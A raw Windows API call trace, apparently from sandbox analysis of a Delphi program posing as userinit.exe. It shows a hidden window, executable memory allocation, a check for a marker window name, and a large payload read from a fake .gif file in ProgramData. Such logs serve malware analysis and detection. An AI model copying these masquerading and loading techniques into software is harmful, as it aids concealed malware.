[0086.618] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0086.618] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0086.618] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0086.618] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0086.618] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0086.618] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0086.618] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0086.618] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0086.618] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0086.618] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0086.618] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0086.618] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0086.618] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0086.618] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0086.618] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0086.618] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0086.618] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0086.618] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0086.618] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0086.618] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0086.618] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0086.618] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0086.618] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0086.618] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0086.618] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0086.618] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0086.618] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0086.618] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0086.618] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0086.619] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0086.619] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0086.619] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0086.619] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0086.619] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0086.619] LoadStringA (in: hInstance=0x400000, uID=0xff24, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0086.619] LoadStringA (in: hInstance=0x400000, uID=0xff23, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0086.619] LoadStringA (in: hInstance=0x400000, uID=0xff22, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0086.619] LoadStringA (in: hInstance=0x400000, uID=0xff21, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0086.619] LoadStringA (in: hInstance=0x400000, uID=0xff20, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0086.619] LoadStringA (in: hInstance=0x400000, uID=0xff3f, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0086.619] LoadStringA (in: hInstance=0x400000, uID=0xff3e, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0086.619] LoadStringA (in: hInstance=0x400000, uID=0xff3d, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0086.619] LoadStringA (in: hInstance=0x400000, uID=0xff3c, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0086.619] LoadStringA (in: hInstance=0x400000, uID=0xff3b, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0086.619] LoadStringA (in: hInstance=0x400000, uID=0xff3a, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0086.619] LoadStringA (in: hInstance=0x400000, uID=0xff39, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0086.619] LoadStringA (in: hInstance=0x400000, uID=0xff38, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0086.619] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0086.619] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0086.619] GetVersion () returned 0x1db10106
[0086.619] GetCurrentProcessId () returned 0xf48
[0086.619] GlobalAddAtomA (lpString="Delphi00000F48") returned 0xc15a
[0086.619] GetCurrentThreadId () returned 0xf4c
[0086.619] GlobalAddAtomA (lpString="ControlOfs0040000000000F4C") returned 0xc159
[0086.619] RegisterClipboardFormatA (lpszFormat="ControlOfs0040000000000F4C") returned 0xc15d
[0086.620] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0086.620] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0086.620] GetSystemMetrics (nIndex=19) returned 1
[0086.655] GetSystemMetrics (nIndex=75) returned 1
[0086.655] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x581310, fWinIni=0x0 | out: pvParam=0x581310) returned 1
[0086.655] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0086.655] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0086.655] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x101af
[0086.655] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0086.655] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0086.656] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0086.656] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x101b1
[0086.656] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x101b3
[0086.656] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x101b5
[0086.656] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x101b7
[0086.656] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x101b9
[0086.657] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x101bb
[0086.657] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0086.657] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0086.657] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0086.657] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0086.657] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0086.657] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0086.657] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0086.657] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0086.657] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0086.657] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0086.657] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0086.657] GetDC (hWnd=0x0) returned 0x2b010799
[0086.657] GetDeviceCaps (hdc=0x2b010799, index=90) returned 96
[0086.657] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0086.658] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0086.658] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x444d6c, dwData=0x58155c) returned 1
[0086.658] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x12f94f, fWinIni=0x0 | out: pvParam=0x12f94f) returned 1
[0086.658] CreateFontIndirectA (lplf=0x12f94f) returned 0xd0a0837
[0086.658] GetObjectA (in: h=0xd0a0837, c=60, pv=0x12f740 | out: pv=0x12f740) returned 60
[0086.658] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x12f7fb, fWinIni=0x0 | out: pvParam=0x12f7fb) returned 1
[0086.658] CreateFontIndirectA (lplf=0x12f8d7) returned 0x140a0722
[0086.658] GetObjectA (in: h=0x140a0722, c=60, pv=0x12f740 | out: pv=0x12f740) returned 60
[0086.658] CreateFontIndirectA (lplf=0x12f89b) returned 0x160a0836
[0086.658] GetObjectA (in: h=0x160a0836, c=60, pv=0x12f740 | out: pv=0x12f740) returned 60
[0086.659] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x0
[0086.659] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x12f8af, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0086.659] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x12f8af | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0086.659] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0xd0000
[0086.659] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x12f864 | out: lpWndClass=0x12f864) returned 0
[0086.659] RegisterClassA (lpWndClass=0x451c88) returned 0x20c160
[0086.659] GetSystemMetrics (nIndex=0) returned 1440
[0086.659] GetSystemMetrics (nIndex=1) returned 900
[0086.659] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="userinit", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x20102
[0086.664] SetWindowLongA (hWnd=0x20102, nIndex=-4, dwNewLong=856047) returned 4219500
[0086.664] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0086.664] SendMessageA (hWnd=0x20102, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0086.664] DefWindowProcA (hWnd=0x20102, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0086.680] DefWindowProcA (hWnd=0x20102, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x101bd
[0086.684] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0086.684] SetClassLongA (hWnd=0x20102, nIndex=-14, dwNewLong=65575) returned 0x0
[0086.694] GetSystemMenu (hWnd=0x20102, bRevert=0) returned 0x101c3
[0086.696] DeleteMenu (hMenu=0x101c3, uPosition=0xf030, uFlags=0x0) returned 1
[0086.696] DeleteMenu (hMenu=0x101c3, uPosition=0xf000, uFlags=0x0) returned 1
[0086.696] DeleteMenu (hMenu=0x101c3, uPosition=0xf010, uFlags=0x0) returned 1
[0086.697] GetKeyboardLayoutList (in: nBuff=64, lpList=0x12f830 | out: lpList=0x12f830) returned 1
[0086.698] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0086.698] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0086.699] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6ced0000
[0086.699] GetProcAddress (hModule=0x6ced0000, lpProcName="InitializeFlatSB") returned 0x6cf0266f
[0086.699] GetProcAddress (hModule=0x6ced0000, lpProcName="UninitializeFlatSB") returned 0x6cf02542
[0086.699] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollProp") returned 0x6cf01d29
[0086.699] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollProp") returned 0x6cf0238d
[0086.699] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_EnableScrollBar") returned 0x6cf020c9
[0086.699] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_ShowScrollBar") returned 0x6cf01fdb
[0086.699] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollRange") returned 0x6cf01e8d
[0086.699] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollInfo") returned 0x6cf01f0f
[0086.699] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollPos") returned 0x6cf01ccd
[0086.700] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollPos") returned 0x6cf0216d
[0086.700] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollInfo") returned 0x6cf022be
[0086.700] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollRange") returned 0x6cf021e2
[0086.700] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0086.700] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0086.700] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0086.700] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0086.700] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0086.700] GetCurrentThreadId () returned 0xf4c
[0086.700] GlobalAddAtomA (lpString="WndProcPtr0040000000000F4C") returned 0xc156
[0086.700] VirtualAlloc (lpAddress=0x584000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x584000
[0086.701] ShowWindow (hWnd=0x20102, nCmdShow=0) returned 0
[0086.701] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0086.701] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmg.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmg.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98
[0086.701] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x12f5b0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12f5b0*=0) returned 0x0
[0086.701] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x12f5a8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12f5a8*=0) returned 0x0
[0086.701] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x12f5a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12f5a8*=0) returned 0x10be00
[0086.702] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x12f5a8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12f5a8*=0) returned 0x0
[0086.702] GlobalLock (hMem=0xca0004) returned 0xd20020
[0086.702] ReadFile (in: hFile=0x98, lpBuffer=0xd20020, nNumberOfBytesToRead=0x10be00, lpNumberOfBytesRead=0x12f5c4, lpOverlapped=0x0 | out: lpBuffer=0xd20020*, lpNumberOfBytesRead=0x12f5c4*=0x10be00, lpOverlapped=0x0) returned 1
[0086.760] CloseHandle (hObject=0x98) returned 1
[0086.808] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.808] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.808] GlobalUnlock (hMem=0xca000c) returned 0
[0086.808] GlobalReAlloc (hMem=0xca000c, dwBytes=0x4000, uFlags=0x2) returned 0xca000c
[0086.808] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.809] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.809] GlobalUnlock (hMem=0xca000c) returned 0
[0086.809] GlobalReAlloc (hMem=0xca000c, dwBytes=0x6000, uFlags=0x2) returned 0xca000c
[0086.810] GlobalLock (hMem=0xca000c) returned 0x1fa820
[0086.810] GlobalHandle (pMem=0x1fa820) returned 0xca000c
[0086.810] GlobalUnlock (hMem=0xca000c) returned 0
[0086.810] GlobalReAlloc (hMem=0xca000c, dwBytes=0x8000, uFlags=0x2) returned 0xca000c
[0086.811] GlobalLock (hMem=0xca000c) returned 0x200830
[0086.811] GlobalHandle (pMem=0x200830) returned 0xca000c
[0086.811] GlobalUnlock (hMem=0xca000c) returned 0
[0086.811] GlobalReAlloc (hMem=0xca000c, dwBytes=0xa000, uFlags=0x2) returned 0xca000c
[0086.811] GlobalLock (hMem=0xca000c) returned 0x200830
[0086.812] GlobalHandle (pMem=0x200830) returned 0xca000c
[0086.812] GlobalUnlock (hMem=0xca000c) returned 0
[0086.812] GlobalReAlloc (hMem=0xca000c, dwBytes=0xc000, uFlags=0x2) returned 0xca000c
[0086.813] GlobalLock (hMem=0xca000c) returned 0x20a840
[0086.813] GlobalHandle (pMem=0x20a840) returned 0xca000c
[0086.813] GlobalUnlock (hMem=0xca000c) returned 0
[0086.813] GlobalReAlloc (hMem=0xca000c, dwBytes=0xe000, uFlags=0x2) returned 0xca000c
[0086.813] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.814] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.814] GlobalUnlock (hMem=0xca000c) returned 0
[0086.814] GlobalReAlloc (hMem=0xca000c, dwBytes=0x10000, uFlags=0x2) returned 0xca000c
[0086.814] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.815] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.815] GlobalUnlock (hMem=0xca000c) returned 0
[0086.815] GlobalReAlloc (hMem=0xca000c, dwBytes=0x12000, uFlags=0x2) returned 0xca000c
[0086.815] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.815] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.815] GlobalUnlock (hMem=0xca000c) returned 0
[0086.815] GlobalReAlloc (hMem=0xca000c, dwBytes=0x14000, uFlags=0x2) returned 0xca000c
[0086.815] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.816] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.816] GlobalUnlock (hMem=0xca000c) returned 0
[0086.816] GlobalReAlloc (hMem=0xca000c, dwBytes=0x16000, uFlags=0x2) returned 0xca000c
[0086.816] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.816] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.816] GlobalUnlock (hMem=0xca000c) returned 0
[0086.816] GlobalReAlloc (hMem=0xca000c, dwBytes=0x18000, uFlags=0x2) returned 0xca000c
[0086.817] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.817] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.817] GlobalUnlock (hMem=0xca000c) returned 0
[0086.817] GlobalReAlloc (hMem=0xca000c, dwBytes=0x1a000, uFlags=0x2) returned 0xca000c
[0086.817] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.818] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.818] GlobalUnlock (hMem=0xca000c) returned 0
[0086.818] GlobalReAlloc (hMem=0xca000c, dwBytes=0x1c000, uFlags=0x2) returned 0xca000c
[0086.818] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.818] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.818] GlobalUnlock (hMem=0xca000c) returned 0
[0086.818] GlobalReAlloc (hMem=0xca000c, dwBytes=0x1e000, uFlags=0x2) returned 0xca000c
[0086.818] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.819] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.819] GlobalUnlock (hMem=0xca000c) returned 0
[0086.819] GlobalReAlloc (hMem=0xca000c, dwBytes=0x20000, uFlags=0x2) returned 0xca000c
[0086.819] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.820] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.820] GlobalUnlock (hMem=0xca000c) returned 0
[0086.820] GlobalReAlloc (hMem=0xca000c, dwBytes=0x22000, uFlags=0x2) returned 0xca000c
[0086.822] GlobalLock (hMem=0xca000c) returned 0x216820
[0086.822] GlobalHandle (pMem=0x216820) returned 0xca000c
[0086.822] GlobalUnlock (hMem=0xca000c) returned 0
[0086.822] GlobalReAlloc (hMem=0xca000c, dwBytes=0x24000, uFlags=0x2) returned 0xca000c
[0086.822] GlobalLock (hMem=0xca000c) returned 0x216820
[0086.823] GlobalHandle (pMem=0x216820) returned 0xca000c
[0086.823] GlobalUnlock (hMem=0xca000c) returned 0
[0086.823] GlobalReAlloc (hMem=0xca000c, dwBytes=0x26000, uFlags=0x2) returned 0xca000c
[0086.826] GlobalLock (hMem=0xca000c) returned 0x23a830
[0086.826] GlobalHandle (pMem=0x23a830) returned 0xca000c
[0086.826] GlobalUnlock (hMem=0xca000c) returned 0
[0086.826] GlobalReAlloc (hMem=0xca000c, dwBytes=0x28000, uFlags=0x2) returned 0xca000c
[0086.826] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.827] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.827] GlobalUnlock (hMem=0xca000c) returned 0
[0086.827] GlobalReAlloc (hMem=0xca000c, dwBytes=0x2a000, uFlags=0x2) returned 0xca000c
[0086.827] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.827] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.828] GlobalUnlock (hMem=0xca000c) returned 0
[0086.828] GlobalReAlloc (hMem=0xca000c, dwBytes=0x2c000, uFlags=0x2) returned 0xca000c
[0086.828] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.828] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.828] GlobalUnlock (hMem=0xca000c) returned 0
[0086.828] GlobalReAlloc (hMem=0xca000c, dwBytes=0x2e000, uFlags=0x2) returned 0xca000c
[0086.828] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.829] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.829] GlobalUnlock (hMem=0xca000c) returned 0
[0086.829] GlobalReAlloc (hMem=0xca000c, dwBytes=0x30000, uFlags=0x2) returned 0xca000c
[0086.829] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.829] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.829] GlobalUnlock (hMem=0xca000c) returned 0
[0086.829] GlobalReAlloc (hMem=0xca000c, dwBytes=0x32000, uFlags=0x2) returned 0xca000c
[0086.829] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.830] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.830] GlobalUnlock (hMem=0xca000c) returned 0
[0086.830] GlobalReAlloc (hMem=0xca000c, dwBytes=0x34000, uFlags=0x2) returned 0xca000c
[0086.830] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.831] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.831] GlobalUnlock (hMem=0xca000c) returned 0
[0086.831] GlobalReAlloc (hMem=0xca000c, dwBytes=0x36000, uFlags=0x2) returned 0xca000c
[0086.831] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.831] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.831] GlobalUnlock (hMem=0xca000c) returned 0
[0086.831] GlobalReAlloc (hMem=0xca000c, dwBytes=0x38000, uFlags=0x2) returned 0xca000c
[0086.831] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.832] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.832] GlobalUnlock (hMem=0xca000c) returned 0
[0086.832] GlobalReAlloc (hMem=0xca000c, dwBytes=0x3a000, uFlags=0x2) returned 0xca000c
[0086.832] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.833] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.833] GlobalUnlock (hMem=0xca000c) returned 0
[0086.833] GlobalReAlloc (hMem=0xca000c, dwBytes=0x3c000, uFlags=0x2) returned 0xca000c
[0086.833] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.833] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.833] GlobalUnlock (hMem=0xca000c) returned 0
[0086.833] GlobalReAlloc (hMem=0xca000c, dwBytes=0x3e000, uFlags=0x2) returned 0xca000c
[0086.833] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.834] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.834] GlobalUnlock (hMem=0xca000c) returned 0
[0086.834] GlobalReAlloc (hMem=0xca000c, dwBytes=0x40000, uFlags=0x2) returned 0xca000c
[0086.834] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.834] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.834] GlobalUnlock (hMem=0xca000c) returned 0
[0086.834] GlobalReAlloc (hMem=0xca000c, dwBytes=0x42000, uFlags=0x2) returned 0xca000c
[0086.835] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.835] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.835] GlobalUnlock (hMem=0xca000c) returned 0
[0086.835] GlobalReAlloc (hMem=0xca000c, dwBytes=0x44000, uFlags=0x2) returned 0xca000c
[0086.835] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.836] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.836] GlobalUnlock (hMem=0xca000c) returned 0
[0086.836] GlobalReAlloc (hMem=0xca000c, dwBytes=0x46000, uFlags=0x2) returned 0xca000c
[0086.836] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.836] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.836] GlobalUnlock (hMem=0xca000c) returned 0
[0086.836] GlobalReAlloc (hMem=0xca000c, dwBytes=0x48000, uFlags=0x2) returned 0xca000c
[0086.836] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.837] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.837] GlobalUnlock (hMem=0xca000c) returned 0
[0086.837] GlobalReAlloc (hMem=0xca000c, dwBytes=0x4a000, uFlags=0x2) returned 0xca000c
[0086.837] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.838] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.838] GlobalUnlock (hMem=0xca000c) returned 0
[0086.838] GlobalReAlloc (hMem=0xca000c, dwBytes=0x4c000, uFlags=0x2) returned 0xca000c
[0086.838] GlobalLock (hMem=0xca000c) returned 0x1f6810
